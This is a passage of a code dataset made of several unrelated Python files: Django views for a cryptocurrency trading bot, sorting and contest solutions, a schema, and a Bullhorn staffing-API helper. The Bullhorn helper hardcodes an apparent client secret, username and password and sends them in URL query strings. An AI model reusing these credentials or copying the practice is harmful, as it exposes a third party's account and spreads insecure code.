request):\n search = request.body.decode(\"utf-8\")\n search_data = json.loads(search)\n t_currency = search_data.get('t_currency')\n t_market = search_data.get('t_market')\n t_status = search_data.get('t_status')\n search_dict = dict()\n if t_currency:\n search_dict['currency'] = t_currency\n if t_market:\n search_dict['market'] = t_market\n if t_status:\n search_dict['status'] = t_status\n\n t_data = Robot.objects.filter(**search_dict)\n # 序列化\n return restful.result(RobotSerializer(t_data, many=True).data)\n\n\nclass GetAccountInfo(generics.CreateAPIView):\n \"\"\"\n 展示交易对可用额度/当前价,计算默认值\n \"\"\"\n serializer_class = AccountSerializer\n\n def data_format(self, data):\n data = str(round(float(data), 2))\n return data\n\n def post(self, request):\n data = request.body.decode('utf-8')\n tdata = json.loads(data)\n currency = tdata.get('curry_title')\n market = tdata.get('market_title')\n # 获取账户id\n id = tdata.get('account_id')\n\n if currency and market and id:\n # 调用get_account_info函数\n user_obj, service_obj, market_obj = get_account_info(currency, market, id)\n try:\n info = service_obj.get_balance()\n info = info['funds']\n info1 = market_obj.get_ticker()\n info1 = info1['ticker']\n info2 = market_obj.get_klines('1day', '30')\n info2 = info2.get('datas')\n except:\n print(info)\n return restful.params_error(message='币种错误或者调用接口失败,请核对!')\n # 计算阻力位/支撑位的默认值\n if int(info2.get('limit', 0)) <= 30:\n max = 0\n min = 0\n for i in info2['data']:\n max += float(i[2])\n min += float(i[3])\n context = {\n # 账户起始交易币种总资产\n 'total_currency': self.data_format(info[currency.upper()].get('total')) + ' ' + currency,\n # 账户起始交易市场币种总资产\n 'total_market': self.data_format(info[market.upper()].get('total')) + ' ' + market,\n # 交易币种可用\n 'currency': self.data_format(info[currency.upper()].get('balance')) + ' ' + currency,\n # 交易市场可用\n 'market': self.data_format(info[market.upper()].get('balance')) + ' ' + market,\n # 当前价\n 'last': self.data_format(info1.get('last')) + '' + market,\n # 阻力位\n 'resistance': round(float(max / int(info2['limit'])), 2),\n # 支撑位\n 'support_level': round(float(min / int(info2['limit'])), 2),\n\n }\n print(context)\n return restful.result(data=context)\n else:\n return restful.params_error(message='参数为空')\n\n\nclass RobotProtection(generics.CreateAPIView):\n \"\"\"\n 机器人保护\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n data = request.body.decode('utf-8')\n data_dict = json.loads(data)\n id = data_dict.get('robot_id')\n flag = data_dict.get('flag')\n protect = data_dict.get('protect')\n if id and flag and protect:\n Robot.objects.filter(id=id).update(status=flag)\n Robot.objects.filter(id=id).update(protection=protect)\n\n return restful.ok()\n else:\n return restful.params_error(message='参数为空')\n\n\nclass StartRobot(generics.CreateAPIView):\n \"\"\"\n 管理机器人\n \"\"\"\n serializer_class = AccountSerializer\n order_list = \"\"\n\n def post(self, request):\n data = request.body.decode(\"utf-8\")\n data_dict = json.loads(data)\n # 多个和一个\n ids = data_dict.get('robot_id')\n # Flag为1启动,为0停止\n Flag = data_dict.get('flag')\n if Flag is None:\n return restful.params_error(message='参数flag为空')\n if ids:\n robots = Robot.objects.filter(id=ids)\n elif Flag == 1:\n robots = Robot.objects.filter(Q(status=0) & Q(protection=1))\n elif Flag == 0:\n robots = Robot.objects.filter(Q(status=1) & Q(protection=1))\n\n Flag = int(Flag)\n # 调用对应策略\n for robot_obj in robots:\n if robot_obj.trading_strategy == '网格交易V1.0' and Flag == 1:\n Robot.objects.filter(id=robot_obj.id).update(run_status=0, status=Flag)\n # Robot.objects.filter(id=robot_obj.id).update(status=Flag)\n # 启动线程\n thread1 = GridStrategy(robot_obj=robot_obj, order_type=\"buy\")\n thread2 = GridStrategy(robot_obj=robot_obj, order_type=\"sell\")\n thread1.start()\n thread2.start()\n print('-' * 30, '启动线程')\n elif robot_obj.trading_strategy == '网格交易V1.0' and Flag == 0:\n Robot.objects.filter(id=robot_obj.id).update(run_status=1, status=Flag)\n # Robot.objects.filter(id=robot_obj.id).update(run_status=1)\n # 停止线程\n for item in threading.enumerate():\n try:\n # 获取线程对应的机器人\n robot = item.robot_obj\n if robot_obj.id == robot.id:\n item.setFlag(False)\n rtime = time.time() - item.start_time\n Robot.objects.filter(id=robot_obj.id).update(running_time=rtime)\n except:\n print('对象没有属性robot_obj')\n continue\n\n elif robot_obj.trading_strategy == '三角套利V1.0':\n pass\n elif robot_obj.trading_strategy == '搬砖套利V1.0':\n pass\n\n StartRobot.order_list = threading.enumerate()\n return restful.ok()\n\n\nclass ShowTradeDetail(generics.CreateAPIView):\n \"\"\"\n 展示机器人交易详情\n \"\"\"\n serializer_class = AccountSerializer\n\n def data_format(self, data):\n data = str(round(float(data), 2))\n return data\n\n def changeTime(self, allTime):\n day = 24 * 60 * 60\n hour = 60 * 60\n min = 60\n if allTime < 60:\n return \"%d 秒\" % math.ceil(allTime)\n elif allTime > day:\n days = divmod(allTime, day)\n return \"%d 天, %s\" % (int(days[0]), self.changeTime(days[1]))\n elif allTime > hour:\n hours = divmod(allTime, hour)\n return '%d 时, %s' % (int(hours[0]), self.changeTime(hours[1]))\n else:\n mins = divmod(allTime, min)\n return \"%d 分, %d 秒\" % (int(mins[0]), math.ceil(mins[1]))\n\n def sort_data(self, order_info):\n sells = dict()\n buys = dict()\n for k, v in order_info.items():\n if v[\"order_type\"] is \"sell\":\n sells[k] = v\n elif v[\"order_type\"] is \"buy\":\n buys[k] = v\n buys = sorted(buys.items(), key=lambda x: x[1][\"price\"], reverse=True)\n sells = sorted(sells.items(), key=lambda x: x[1][\"price\"])\n return dict(sells), dict(buys)\n\n def post(self, request):\n data = request.body.decode(\"utf-8\")\n data_dict = json.loads(data)\n # 获取机器人id\n id = data_dict.get('robot_id')\n if id:\n robot_obj = Robot.objects.get(id=id)\n currency = robot_obj.currency\n market = robot_obj.market\n # 调用函数\n try:\n user_obj, service_obj, market_obj = get_account_info(currency, market, robot_obj.trading_account_id)\n info = service_obj.get_balance()\n # print(\"交易详情\"+info)\n info = info.get('funds')\n info1 = market_obj.get_ticker()\n info1 = info1.get('ticker')\n except Exception as e:\n return restful.params_error(message='币种错误,请核对!')\n property_obj = Property.objects.get(Q(account_id=robot_obj.trading_account) & Q(currency=currency))\n closed_order = OrderInfo.objects.filter(robot=id).order_by(\"-id\")\n serialize = OrderInfoSerializer(closed_order, many=True)\n\n # 获取挂单信息\n order_info = dict()\n running_time = 0\n for item in StartRobot.order_list:\n try:\n # 获取机器人对应的线程对象\n robot = item.robot_obj\n if id == str(robot.id):\n # 向字典中添加数据\n order_info = {**order_info, **item.id_dict}\n running_time = time.time() - item.start_time\n except:\n print('对象没有属性robot_obj')\n continue\n sell, buy = self.sort_data(order_info)\n\n context = {\n # 交易币种和交易市场\n 'currency_market': {\"currency\": currency, \"market\": market},\n # 已完成笔数\n 'closed_num': len(closed_order),\n # 已完成挂单信息\n 'closed_info': serialize.data,\n # 未完成笔数\n 'open_num': len(order_info),\n # 未完成卖单信息\n 'SELL': sell,\n # 未完成买单信息\n 'BUY': buy,\n # 总投入\n 'total_input': self.data_format(property_obj.original_assets),\n # 运行时间\n 'running_time': self.changeTime(running_time),\n # 交易币种可用\n 'currency_balance': self.data_format(info[currency.upper()].get('balance')) + ' ' + currency,\n # 交易市场可用\n 'market_balance': self.data_format(info[market.upper()].get('balance')) + ' ' + market,\n # 交易币种冻结\n 'currency_freeze': self.data_format(info[currency.upper()].get('freeze')) + ' ' + currency,\n # 交易市场冻结\n 'market_freeze': self.data_format(info[market.upper()].get('freeze')) + ' ' + market,\n # 当前价\n 'last': self.data_format(info1.get('last')) + ' ' + market,\n # 总收益\n 'profit': self.data_format(\n (float(info[currency.upper()].get('total')) - float(property_obj.original_assets))\n * float(info1.get('last'))) + ' ' + market,\n }\n\n # print(context)\n # print('/-' * 30, len(sell), len(buy))\n return restful.result(data=context)\n else:\n return restful.params_error(message='参数为空')\n\n\nclass ShowConfigInfo(generics.CreateAPIView):\n \"\"\"\n 展示机器人配置信息\n \"\"\"\n serializer_class = AccountSerializer\n\n def data_format(self, data):\n data = str(round(float(data), 2))\n return data\n\n def post(self, request):\n data = request.body.decode(\"utf-8\")\n data_dict = json.loads(data)\n id = data_dict.get('robot_id')\n if id:\n robot_obj = Robot.objects.get(id=id)\n account_obj = Account.objects.filter(id=robot_obj.trading_account.id).first()\n # data = serialize(\"json\", Robot.objects.filter(id=id))\n account = Robot.objects.get(id=id)\n serialize = RobotSerializer(account)\n user_obj, service_obj, market_obj = get_account_info(robot_obj.currency, robot_obj.market,\n robot_obj.trading_account.id)\n robot_warning = Robot.objects.get(id=id)\n # accounts = UserInfo.objects.filter(id__in=robot_warning.warning_account[1:-1].split(\",\"))\n accounts = robot_warning.warning_account\n try:\n info = service_obj.get_balance()\n info = info.get('funds')\n except:\n return restful.params_error(message='币种错误,请核对!')\n # print(json.loads(data)['pk'], type(json.loads(data)))\n context = {\n # 交易币种可用\n 'currency': self.data_format(info[robot_obj.currency.upper()].get('balance')) + ' ' + robot_obj.currency,\n # 交易市场可用\n 'market': self.data_format(info[robot_obj.market.upper()].get('balance')) + ' ' + robot_obj.market,\n # 账户信息\n 'account_name': str(account_obj.title),\n # 机器人信息\n 'robot': serialize.data,\n # 已勾选的预警用户\n 'warning_account': accounts\n }\n print(context)\n return restful.result(data=context)\n else:\n return restful.params_error(message='参数为空')\n\n\nclass ShowConfig(generics.CreateAPIView):\n \"\"\"\n 修改机器人配置信息\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n print('-----------------')\n try:\n data = request.body.decode(\"utf-8\")\n print(data)\n data_dict = json.loads(data)\n # 获取机器人id\n id = data_dict.get('robot_id')\n # 获取挂单频率\n orders_frequency = data_dict.get('orders_frequency')\n # 获取挂单最小数量\n min_num = data_dict.get('min_num')\n # 获取挂单最大数量\n max_num = data_dict.get('max_num')\n # 获取止损价\n stop_price = data_dict.get('stop_price')\n # 获取预警价\n warning_price = data_dict.get('warning_price')\n except:\n import traceback\n traceback.print_exc()\n Robot.objects.filter(id=id).update(\n orders_frequency=orders_frequency,\n min_num=min_num,\n max_num=max_num,\n stop_price=stop_price,\n warning_price=warning_price,\n )\n return restful.ok()\n\n\nclass WarningUsers(generics.CreateAPIView):\n \"\"\"\n 序列化预警账户\n \"\"\"\n serializer_class = AccountSerializer\n\n def get(self, request):\n try:\n users = UserInfo.objects.filter(status=1)\n usr = UserSerializer(users, many=True)\n except Exception as e:\n import traceback\n traceback.print_exc()\n print(e)\n return restful.result(data=usr.data)\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n\nclass RobotList(generics.CreateAPIView):\n \"\"\"\n 机器人管理列表页面\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n data = request.body.decode(\"utf-8\")\n data_dict = json.loads(data)\n pageNum = int(data_dict.get('pageIndex', 1))\n pagesize = data_dict.get('pageSize')\n if pageNum is None:\n return restful.params_error(message='参数为空')\n\n robots = Robot.objects.all()\n try:\n paginator = Paginator(robots, 2)\n page_obj = paginator.page(pageNum)\n except:\n return restful.params_error(message='页码错误')\n numPerPage = len(page_obj.object_list)\n totalCount = robots.count()\n totalPageNum = paginator.num_pages\n\n context = {\n 'numPerPage': numPerPage,\n 'PageNum': pageNum,\n 'result': RobotSerializer(page_obj.object_list, many=True).data,\n 'totalCount': totalCount,\n 'totalPageNum': totalPageNum,\n 'account': RobotSerializer(robots, fields=('account_id', 'account_title'), many=True).data\n }\n\n return restful.result(data=context)\n\n\nclass RobotYield(generics.CreateAPIView):\n \"\"\"\n 机器人收益计算更新到数据库\n \"\"\"\n serializer_class = AccountSerializer\n robot_yield = {}\n\n # 用作对数据做精度处理\n def data_format(self, data):\n data = str(round(float(data), 2))\n return data\n\n def post(self, request):\n # 获取用户id\n # sessionid = request.META.get(\"HTTP_SESSIONID\")\n # session_data = Session.objects.get(session_key=sessionid)\n # user_id = session_data.get_decoded().get('user_id')\n user_id = 1\n accounts = Account.objects.filter(users=user_id)\n print(accounts)\n for account in accounts:\n exx_service = ExxService(account.secretkey, account.accesskey)\n robots = Robot.objects.filter(trading_account_id=account.id)\n for robot in robots:\n robot_id = robot.id # 机器人id\n print(\"机器人id:\"+str(robot_id))\n currency = robot.currency # 交易币种\n market = robot.market # 市场币种\n total_money = re.findall('\\d+\\.\\d\\d',robot.total_money)[0] # 总投入\n print(\"总投入\", total_money)\n last_price = robot.current_price # 当时价格\n start_time = float(robot.running_time) # 创建时间\n try:\n print(\"交易币种:\"+currency,\"市场币种:\"+market,\"账户id:\"+ str(account.id))\n user_obj, service_obj, market_obj = get_account_info(currency, market, account.id)\n info = exx_service.get_balance()\n info = info.get('funds')\n info1 = market_obj.get_ticker()\n info1 = info1.get('ticker')\n current_price = info1.get('last') # 最新价格\n balance_currency = self.data_format(info[currency.upper()].get('total')) #可用的交易币种数量\n balance_market = self.data_format(info[market.upper()].get('total')) #冻结的市场币种\n current_time = time.time() #获取最新的时间\n\n run_time = (int(current_time) - int(start_time))/1000*60 #运行多少分钟\n print(balance_market,balance_currency)\n residue_num = ((float(balance_currency) ) / float(last_price) ) + (float(balance_market) )\n float_profit = residue_num * float(current_price) - float(total_money) * float(last_price) #浮动盈亏(折算为交易市场币种):当前剩余币种数量*当前价格-总投入数量*当时价格\n realized_profit = residue_num - float(total_money) #实现利润(折算为交易市场币种):当前剩余币种数量-总投入数量\n total_profit = float_profit + realized_profit #总利润(折算为交易市场币种):浮动盈亏+实现利润\n annual_yield = realized_profit / float(total_money) / (run_time * 525600 * 1 ) #年化收益率:实现利润/总投入/运行分钟数*525,600*100%\n Robot.objects.filter(id=robot_id).update(float_profit=self.data_format(float_profit),\n realized_profit=self.data_format(realized_profit),\n total_profit=self.data_format(total_profit),\n annual_yield=self.data_format(annual_yield))\n robot_obj = Robot.objects.get(id=robot_id)\n serialize = RobotSerializer(robot_obj) #序列化机器人数据返回客户端\n print(serialize.data)\n context = {\n 'id': robot_id,\n 'float_profit': self.data_format(float_profit) + market,\n 'realized_profit': self.data_format(realized_profit) + market,\n 'total_profit': self.data_format(total_profit) + market,\n 'annual_yield': self.data_format(annual_yield) + '%'\n }\n self.robot_yield.update(context)\n except robot.DoesNotExist:\n robot_obj = None\n return restful.result(data=serialize.data)\n\n\n# # 分页\n# def get_pagination_data(paginator, page_obj, around_count=2):\n# current_page = page_obj.number\n# num_pages = paginator.num_pages\n#\n# left_has_more = False\n# right_has_more = False\n#\n# if current_page <= around_count + 2:\n# left_pages = range(1, current_page)\n# else:\n# left_has_more = True\n# left_pages = range(current_page - around_count, current_page)\n#\n# if current_page >= num_pages - around_count - 1:\n# right_pages = range(current_page + 1, num_pages + 1)\n# else:\n# right_has_more = True\n# right_pages = range(current_page + 1, current_page + around_count + 1)\n#\n#\n#\n# return {\n# # left_pages:代表的是当前这页的左边的页的页码\n# 'left_pages': left_pages,\n# # right_pages:代表的是当前这页的右边的页的页码\n# 'right_pages': right_pages,\n# 'current_page': current_page,\n# 'left_has_more': left_has_more,\n# 'right_has_more': right_has_more,\n# 'num_pages': num_pages\n# }\n","repo_name":"qileDai/quantization_deal","sub_path":"apps/deal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":40063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74684239786","text":"#ASHITA GOYAL (11) SEC - A1\r\n\r\ndef countingSort(arr, exp1): \r\n \r\n n = len(arr) \r\n \r\n output = [0] * (n) \r\n \r\n count = [0] * (10) \r\n \r\n for i in range(0, n): \r\n index = (arr[i]/exp1) \r\n count[int((index)%10)] += 1\r\n \r\n for i in range(1,10): \r\n count[i] += count[i-1] \r\n \r\n i = n-1\r\n while i>=0: \r\n index = (arr[i]/exp1) \r\n output[ count[ int((index)%10) ] - 1] = arr[i] \r\n count[int((index)%10)] -= 1\r\n i -= 1\r\n \r\n i = 0\r\n for i in range(0,len(arr)): \r\n arr[i] = output[i] \r\n \r\ndef radixSort(arr):\r\n \r\n max1 = max(arr)\r\n \r\n exp = 1\r\n while max1/exp > 0:\r\n countingSort(arr,exp)\r\n exp *= 10\r\n\r\nl = list(map(int, input(\"ENTER THE LIST TO BE SORTED: \").split()))\r\nradixSort(l)\r\nprint(\"SORTED LIST: \", l)\r\n\r\n#Time - Complexity : O((n+b) * logb(k)), where b is the base for representing numbers, d is the digits in input integers, k is the maximum possible value, n is the number of inputs.\r\n","repo_name":"ashita1910/DAA_Assignments","sub_path":"Radix Sort.py","file_name":"Radix Sort.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26613413603","text":"n = int(input())\nA = [list(input()) for _ in range(n)]\n\ndx = [0, 0, 1, -1, 1, 1, -1, -1]\ndy = [1, -1, 0, 0, 1, -1, 1, -1]\n\n\ndef check(sx, sy, nx, ny):\n ans = [A[sy][sx]]\n cnt = int(A[sy][sx])\n for _ in range(n - 1):\n sx, sy = sx + nx, sy + ny\n if sx < 0:\n sx = n - 1\n if sy < 0:\n sy = n - 1\n if sx >= n:\n sx = 0\n if sy >= n:\n sy = 0\n ans.append(A[sy][sx])\n cnt += int(A[sy][sx])\n\n return ans, cnt\n\n\nma = -1\nret = []\nfor sx in range(n):\n for sy in range(n):\n for i in range(8):\n nx, ny = dx[i], dy[i]\n ans, cnt = check(sx, sy, nx, ny)\n\n ret.append(ans)\n\nrets = [\"\".join(t) for t in ret]\nrets = sorted(rets, reverse=True)\n# print(rets)\nprint(rets[0])\n","repo_name":"mei28/Competitive-programing","sub_path":"ABC-258/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70278562349","text":"from pypath.inputs.disgenet._field import (\n DiseaseClasses,\n Float,\n Int,\n ProteinClass,\n Str,\n Tuple,\n)\n\n\nSCHEMA = {\n 'entrez': (Str, 'geneid'),\n 'genesymbol': (Str, 'gene_symbol'),\n 'uniprot': (Str, 'uniprotid'),\n 'dsi': (Float, '{entity_type}_dsi'),\n 'dpi': (Float, '{entity_type}_dpi'),\n 'pli': (Float, 'gene_pli'),\n 'protein_class': (ProteinClass, ('protein_class', 'protein_class_name')),\n 'classes': (DiseaseClasses, ('disease{i}_class', 'disease{i}_class_name')),\n 'jaccard_genes': Float,\n 'jaccard_variants': Float,\n 'pvalue_jaccard_genes': Float,\n 'pvalue_jaccard_variants': Float,\n 'type': (Str, 'disease_type'),\n 'id': (Str, '{entity_type}id{i}'),\n 'name': (Str, 'disease{i}_name'),\n 'semantic_type': (Str, 'disease_semantic_type'),\n 'ngenes': (Int, 'disease{i}_ngenes'),\n 'nvariants': (Int, 'disease{i}_nvariants'),\n 'consequence_type': (Str, 'variant_consequence_type'),\n 'score': Float,\n 'ei': Float,\n 'el': Str,\n 'year_initial': Int,\n 'year_final': Int,\n 'source': Str,\n}\n","repo_name":"saezlab/pypath","sub_path":"pypath/inputs/disgenet/_schema.py","file_name":"_schema.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"30033350547","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport random\n\ndef rgb2gray(rgb):\n return np.dot(rgb[...,:3],[1,1,1])\n # return np.dot(rgb[...,:3],[0.3,0.59,0.11]) \nimg_rgb = mpimg.imread('C:\\\\Users\\\\gupta\\\\Downloads\\\\book.jpeg')\n\n\nimg_grayo = rgb2gray(img_rgb)\n\nfor i in range(img_grayo.shape[0]):\n for k in range(img_grayo.shape[1]):\n if (i==200 and k>=300 and k<=500) or (k==400 and i>=200 and i<=400) :\n img_grayo[i,k]=1\n else:\n img_grayo[i,k]=0\nplt.imshow(img_grayo, cmap=plt.get_cmap('binary_r')) \nplt.show()","repo_name":"Sanky2104/VS-Code","sub_path":"python/t_dda.py","file_name":"t_dda.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11822653199","text":"import requests\nimport json\n\nfrom dpi.bullhorn.config import BullhornConfig\n\ndef get_bhrest_token():\n ## Required details to get Authentication code, Access code and BhRestToken\n client_id = \"5166a72d-6ddc-454c-aa35-b287d085be8a\"\n client_secret = \"QLcu3T9vSSB0QXsdkH6KIrfn\"\n username = \"dialpad.api\"\n password = \"T32F3kv$P!S][TQ1\"\n response_type = \"code\"\n action = \"Login\"\n state = \"\"\n grant_type = \"authorization_code\"\n redirect_uri = \"\"\n version = \"*\"\n\n ## Bullhorn Authentication base-urls\n get_auth_code_url = \"https://auth.bullhornstaffing.com/oauth/authorize\"\n get_access_token_url = \"https://auth.bullhornstaffing.com/oauth/token\"\n get_bhrest_token_url = \"https://rest.bullhornstaffing.com/rest-services/login\"\n\n ## Request to get Authentication code\n get_auth_code_url += \"?client_id={}&password={}&username={}&action={}&response_type={}\".format(client_id, password, username, action, response_type)\n auth_code_resp = requests.get(url=get_auth_code_url, allow_redirects=False)\n location = auth_code_resp.headers['Location']\n print(\"Auth code resp : {}\".format(location))\n from urllib.parse import urlparse\n parsed_url = urlparse(location)\n print(\"Parsed URL : {}\".format(parsed_url))\n print(\"Code : {}\".format(parsed_url.query[5:]))\n code = parsed_url.query[5:]\n\n ## Request to get Access Token\n get_access_token_url += \"?client_id={}&client_secret={}&grant_type={}&code={}\".format(client_id, client_secret, grant_type, code)\n access_token_resp = requests.post(url=get_access_token_url)\n json_resp = json.loads(access_token_resp.text)\n print(\"Access Token resp : {}\".format(json_resp))\n access_token = json_resp['access_token']\n\n ## Request to get BhRestToken\n get_bhrest_token_url += \"?version={}&access_token={}\".format(version, access_token)\n bhrest_token_resp = requests.post(url=get_bhrest_token_url)\n parsed_resp = json.loads(bhrest_token_resp.text) \n print(\"BhRestToken resp : {}\".format(parsed_resp))\n bhrest_token = parsed_resp.get('BhRestToken')\n return bhrest_token\n\n\n\nclass BullhornAction():\n\n def __init__(self, request, access_token=None, bhrest_token=None):\n self.request = request\n self.access_token = access_token\n self.bhrest_token = bhrest_token\n self.bh_config = BullhornConfig()\n\n def build_free_search_query(self, entity_type, search_val):\n print(\"\\n---------------------- In build_free_search_query() ---------------------\\n\")\n query = \"\"\n search_val = search_val.strip()\n for i, field in enumerate(self.bh_config.entity_types.get(entity_type).get('search_query_fields')):\n if i == 0:\n query += \"{}:{}*\".format(field, search_val)\n else: \n query += \" OR {}:{}*\".format(field, search_val)\n print(\"QUERY = {}\".format(query))\n return query\n\n def build_auto_search_query(self, params):\n print(\"\\n----------------------In build_auto_search_query(params = {}) ---------------------\\n\".format(params))\n \n query = \"\"\n i = 0\n for key, val in params.items():\n if i == 0:\n query += \"{}:{}\".format(key, val[0])\n else: \n query += \" AND {}:{}\".format(key, val[0])\n i +=1\n print(\"AUTO SEARCH QUERY -- = {}\".format(query))\n return query\n \n def make_request(self, url, method, body=dict()):\n print(\"\\n---------------------- In make_request(url={}, method={}, body={}) ---------------------\\n\".format(url, method, body))\n request_resp = None\n resp = {}\n if method == \"GET\":\n request_resp = requests.get(url)\n elif method == \"POST\":\n request_resp = requests.post(url, data=body)\n elif method == \"PUT\":\n request_resp = requests.put(url, data=body)\n elif method == \"PATCH\":\n request_resp = requests.patch(url, data=body)\n \n if request_resp.status_code == 200:\n resp.update(json.loads(request_resp.text))\n resp['status'] = 200\n elif request_resp.status_code == 400:\n resp.update(json.loads(request_resp.text))\n resp['status'] = 400\n elif request_resp.status_code == 401:\n resp.update(json.loads(request_resp.text))\n resp['status'] = 401\n elif request_resp.status_code == 403:\n resp.update(json.loads(request_resp.text))\n resp['status'] = 403\n else:\n resp.update(json.loads(request_resp.text))\n resp['status'] = 500\n return resp\n \n def search_contact(self):\n print(\"\\n----------------------In search_contact() ---------------------\\n\")\n search = self.request.args.get(\"search\", False)\n query = \"\"\n \n entity_types = [key for key,val in self.bh_config.entity_types.items()]\n final_response = {\n 'data' : list(),\n 'count' : 0,\n 'status': None\n }\n for entity_type in entity_types:\n if not self.bh_config.entity_types.get(entity_type).get('is_contact_entity'):\n continue\n print(\"\\n***************************** Start Searching for {}s ***************************** \".format(entity_type.capitalize()))\n if search:\n query = self.build_free_search_query(entity_type, search)\n else:\n params = self.request.args\n if params.get('bhrest_token'):\n del params['bhrest_token']\n if params.get('access_token'):\n del params['access_token']\n query = self.build_auto_search_query(params)\n \n fields = ','.join(self.bh_config.entity_types.get(entity_type).get('response_fields'))\n url = self.bh_config.rest_base_url+self.bh_config.get_entity_url+\"?query={}&fields={}\"\n url = url.format(self.bh_config.entity_types.get(entity_type).get('name'), query, fields)\n url = url+\"&BhRestToken={}\".format(self.bhrest_token)\n print(\"\\nURL : {}\".format(url))\n resp = self.make_request(url, \"GET\")\n\n print(\"REQUEST RESPONSE : {}\".format(resp))\n\n if resp.get('status') == 200:\n final_response['status'] = 200 \n if resp.get('count') > 0:\n data = resp.get('data')\n for rec in data:\n rec['entity_type'] = entity_type\n final_response['data'].extend(data)\n final_response['count'] = final_response['count'] + resp.get('count')\n elif resp.get('status') == 401 or resp.get('status') == 403:\n final_response = resp\n break\n else:\n final_response = resp\n print(\"******************************** End Search for {}'s ******************************\\n\".format(entity_type.capitalize()))\n print(\"\\nTotal Response : {}\\n\".format(final_response))\n return final_response\n\n\n def create_contact(self):\n pass\n\n def create_note(self):\n pass\n\n def get_notes(self):\n pass\n\n def create_task(self):\n pass\n \n def get_tasks(self):\n pass\n\n ","repo_name":"chandra-sekar-1983/bullhorn_repo_final","sub_path":"server/dpi/bullhorn/api/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6353148831","text":"from collections import *\n\ndef load_model(model_file):\n\n return 0\n\n#素性を色々試す\ndef create_features(x):\n phi = defaultdict(int)\n words = x.split(' ')\n\n l = len(words)\n if l < 15:\n phi[f'LEN:{l}'] += 1\n \n for i in range(len(words)-1):\n lis = words[i:i+2]\n phi['BI:' + ' '.join(lis)] += 1\n \n #for word in words:\n # phi[\"UNI:\" + word] += 1\n \n for word in words:\n phi[\"UNI:\" + word] += 1\n #if word == word.upper():\n # phi['UPPER:' + word] += 1\n if word == word.lower():\n phi['LOWER:' + word] += 1\n return phi\n\ndef predict_one(weight, phi):\n score = 0\n for name, value in phi.items():\n if name in weight: score += value * weight[name]\n\n if score >= 0:\n return 1\n return -1\n\ndef predict_all(w, input_file, out_file):\n with open(input_file) as f, open(out_file, 'w') as out:\n for line in f:\n phi = create_features(line)\n y_pred = predict_one(w, phi)\n out.write(f'{y_pred}\\t{line}')\n\n\n\ndef online_learning(iteration_number, data):\n weights = defaultdict(int)\n\n for _ in range(iteration_number):\n with open(data) as f:\n for line in f:\n #print(line.strip().split('\\t'))\n y, x = line.strip().split('\\t')\n y = int(y)\n phi = create_features(x)\n pred_y = predict_one(weights, phi)\n\n if pred_y != y:\n update_weights(weights, phi, y)\n return weights\n\ndef update_weights(weight, phi, y):\n for name, value in phi.items():\n weight[name] += float(value * y)\n\n\n\ndef confirm_diff(answer, my_answer, positive_mispredicted_file, negative_mispredicted_file):\n\n p_cnt = 0\n n_cnt = 0\n n_words = defaultdict(lambda: 0)\n p_words = defaultdict(lambda: 0)\n\n with open(answer) as labels, open(my_answer) as preds:\n with open(positive_mispredicted_file, 'w') as p_mispred, open(negative_mispredicted_file, 'w') as n_mispred:\n for i, (label, pred) in enumerate(zip(labels, preds)):\n now = label.strip().split('\\t')\n y = int(now[0])\n sentence = now[1].split(' ')\n y = int(y)\n pred_y = int(pred.strip().split('\\t')[0])\n if pred_y != y:\n if pred_y == 1:\n n_cnt += 1\n for word in sentence:\n n_words[word] += 1\n n_mispred.write(f'Number:{i+1} {label}')\n else:\n p_cnt += 1\n for word in sentence:\n p_words[word] += 1\n p_mispred.write(f'Number:{i+1} {label}')\n total = p_cnt + n_cnt\n print(f'{p_cnt} + {n_cnt} = {total}')\n n_words = sorted(n_words.items(), key=lambda x: x[1])\n p_words = sorted(p_words.items(), key=lambda x: x[1])\n n_words.reverse()\n p_words.reverse()\n p_mispred.write(f'total mispred:{p_cnt}\\n')\n n_mispred.write(f'total mispred:{n_cnt}\\n')\n '''\n for k, v in n_words:\n n_mispred.write(f'{k} : {v}\\n')\n for k, v in p_words:\n p_mispred.write(f'{k} : {v}\\n')\n '''\n\n\n\n\n\nif __name__ == '__main__':\n path = '/Users/michitaka/lab/NLP_tutorial/nlptutorial/'\n\n #テスト\n input = path + 'test/03-train-input.txt'\n answer = path + 'test/03-train-answer.txt'\n #w = online_learning(5, input)\n #print(w)\n #with open('my_weights.txt','w') as f:\n # for name, value in sorted(w.items()):\n # f.write(f'{name}\\t{value}\\n')\n \n #演習\n data = path + 'data/titles-en-train.labeled'\n input = path + 'data/titles-en-test.word'\n answer = path + 'data/titles-en-test.labeled'\n iter_num = 10\n weights = online_learning(iter_num, data)\n predict_all(weights, input, 'my_answer.labeled')\n pred = '/Users/michitaka/lab/NLP_tutorial/tutorial05/my_answer.labeled'\n confirm_diff(answer, pred, 'p_mispred.labeled', 'n_mispred.labeled')\n\n#uni\n'''\nAccuracy = 92.702798%\n'''\n#+bi\n'''\nAccuracy = 93.198725%\n'''\n#+reversed bi\n'''\nAccuracy = 93.907191%\n'''\n#len\n'''\nAccuracy = 94.048884%\n'''\n#bi + len + upper,lower\n'''\nAccuracy = 94.226001%\n'''\n#uni + bi + len + lower\n'''\nAccuracy = 94.367694%\n'''\n#ni + bi + len + lowe (len < 15)\n'''\nAccuracy = 